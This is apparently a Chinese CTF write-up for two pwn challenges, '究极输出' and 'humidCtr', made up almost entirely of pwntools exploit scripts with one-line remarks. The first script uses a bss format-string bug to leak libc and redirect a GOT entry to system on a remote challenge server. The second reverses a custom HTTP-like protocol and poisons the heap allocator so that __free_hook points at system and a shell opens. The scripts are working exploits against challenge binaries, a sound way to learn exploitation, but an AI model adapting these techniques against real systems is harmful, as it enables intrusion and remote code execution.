究极输出

bss段格式化字符串漏洞,emm感觉有一点点小坑,但不算难。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
# r = process('./pwn1')
r = remote("39.105.99.40",16018)
e = ELF('./pwn1')
libc = e.libc
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
	gdb.attach(r,cmd)

ru(b'HELLO?PWN IT!!!\n')
sl(b"%9$p")

got = 0x403390

og = [0x45226,0x4527a,0xf03a4,0xf1247]
libc_base  = int(rc(14),16)-0x20840
leak("libc_base",libc_base)
sys = libc_base + libc.sym['system']
offest1 = sys & 0xffff 
offest3 = sys & 0xffffff
offest2 = int(offest3/0x10000)
shell = libc_base + og[0]
pl1 = '%13200c%6$hn%4194306c%17$n' 
sl(pl1.encode())

leak('sys',sys)
leak("shell",shell)
#36 8
ru(b'HELLO?PWN IT!!!\n')
pl2 = "%" + "{}c".format(offest2) + "%36$hhn"
pl2 += "%" + "{}c".format(offest1-offest2) + "%8$hn"
sl(pl2.encode())

# dbg('')

r.interactive()

humidCtr

一道协议pwn,漏洞很明显,逆出协议就不难了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
from ctypes import *

r = process('./pwn2')
e = ELF('./pwn2')
libc = e.libc
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
dll = cdll.LoadLibrary("libc.so.6") 

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

dll.srand(dll.time())
def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def add(idx,size,cont):
	ru(b'>\n')
	se(b'POST / HTTP/1.0 \r\n'+b'\x01'+b'&'+str(idx).encode()+b'&'+str(size).encode()+b'&'+cont +b'&')

def edit(idx,cont):
	ru(b'>\n')
	se(b'POST / HTTP/1.0 \r\n'+b'\x02'+b'&'+str(idx).encode()+b'&'+ cont +b'&')
def show(idx):
	ru(b'>\n')
	se(b'POST / HTTP/1.0 \r\n'+b'\x03'+b'&'+str(idx).encode())
def delete(idx):
	ru(b'>\n')
	se(b'POST / HTTP/1.0 \r\n'+b'\x04'+b'&'+str(idx).encode())

num = dll.rand()
#login
ru(b'>\n')
se(b'DEV / HTTP1.0 \r\n' + p32(num) + b"auth") #some problems
add(0,0x48,b'a')
show(0)
libc_base = uu64(b'\x7f')-0x1ecb61
og = [0xe3afe,0xe3b01,0xe3b04]
free_hook = libc_base + libc.sym['__free_hook']
sys = libc_base + libc.sym['system']
leak('libc_base',libc_base)
add(1,0x48,b'b')
add(2,0x48,b'b')
delete(2)
delete(1)
pl1 = b'a'*0x20 + p64(free_hook)
edit(0,pl1)
add(3,0x48,b'/bin/sh\x00')
add(1,0x48,p64(sys))
delete(3)

r.interactive()